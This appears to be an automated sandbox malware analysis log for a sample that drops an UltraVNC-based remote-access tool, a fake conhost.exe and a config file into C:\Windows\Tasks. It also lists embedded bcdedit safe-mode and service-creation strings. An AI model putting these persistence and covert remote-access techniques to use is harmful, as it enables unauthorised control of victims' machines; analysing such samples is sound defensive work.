Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wldp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: sspicli.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winsta.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wldp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\browser_sn.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\Windows\Tasks\UltraVNC.ini

Jump to behavior

Source: C:\Windows\Tasks\browser_sn.exe

File opened: C:\Windows\SYSTEM32\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: T8xrZb7nBL.exe

Static file information: File size 1670955 > 1048576

Source:	Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
Source:	Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr

Source: uqVb3.kkb9h.0.dr

Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: T8xrZb7nBL.exe

Static PE information: real checksum: 0x2af97 should be: 0x1a1b11

Source: uqVb3.kkb9h.0.dr	Static PE information: section name: .didat
Source: uqVb3.kkb9h.2.dr	Static PE information: section name: .didat
Source: conhost.exe.8.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00413660 push eax; ret	0_2_0041368E
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C512EF push rbp; iretd	24_2_00007FF790C512F0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4DC11 push rax; ret	24_2_00007FF790C4DC13
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C51400 push rbp; iretd	24_2_00007FF790C51401
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4DC01 push rcx; ret	24_2_00007FF790C4DC02
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C68CF9 push 8B481074h; iretd	24_2_00007FF790C68CFF
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4DC21 push rsp; ret	24_2_00007FF790C4DC23
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C3FEF1 push rcx; ret	24_2_00007FF790C3FEF2
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C507F8 push rbp; iretd	24_2_00007FF790C507F9
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C512EF push rbp; iretd	28_2_00007FF790C512F0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4DC11 push rax; ret	28_2_00007FF790C4DC13
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C51400 push rbp; iretd	28_2_00007FF790C51401
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4DC01 push rcx; ret	28_2_00007FF790C4DC02
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C68CF9 push 8B481074h; iretd	28_2_00007FF790C68CFF
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4DC21 push rsp; ret	28_2_00007FF790C4DC23
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C3FEF1 push rcx; ret	28_2_00007FF790C3FEF2
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C507F8 push rbp; iretd	28_2_00007FF790C507F9

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows\Tasks\browser_sn.exe

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Xv6Ya.d8LhT	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\browser_sn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\uqVb3.kkb9h	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Xv6Ya.d8LhT	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\browser_sn.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\uqVb3.kkb9h	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DygIR.vkc0f	Jump to dropped file
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h	Jump to dropped file
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\uqVb3.kkb9h	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Xv6Ya.d8LhT	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\DygIR.vkc0f	Jump to dropped file

Source: Xv6Ya.d8LhT.2.dr	Binary or memory string: bcdedit.exe
Source: Xv6Ya.d8LhT.2.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: browser_sn.exe.8.dr	Binary or memory string: bcdedit.exe
Source: browser_sn.exe.8.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: Xv6Ya.d8LhT.0.dr	Binary or memory string: bcdedit.exe
Source: Xv6Ya.d8LhT.0.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	24_2_00007FF790C381AD
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C3E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	24_2_00007FF790C3E1D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C89A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	24_2_00007FF790C89A40
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87BD0 GetPrivateProfileIntA,	24_2_00007FF790C87BD0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87C90 GetPrivateProfileIntA,	24_2_00007FF790C87C90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87E10 GetPrivateProfileIntA,	24_2_00007FF790C87E10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87D50 GetPrivateProfileIntA,	24_2_00007FF790C87D50
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87EB0 GetPrivateProfileIntA,	24_2_00007FF790C87EB0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	24_2_00007FF790C87650
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	24_2_00007FF790C877F0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	24_2_00007FF790C87750
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C87F50 GetPrivateProfileIntA,	24_2_00007FF790C87F50
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	24_2_00007FF790C878E0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA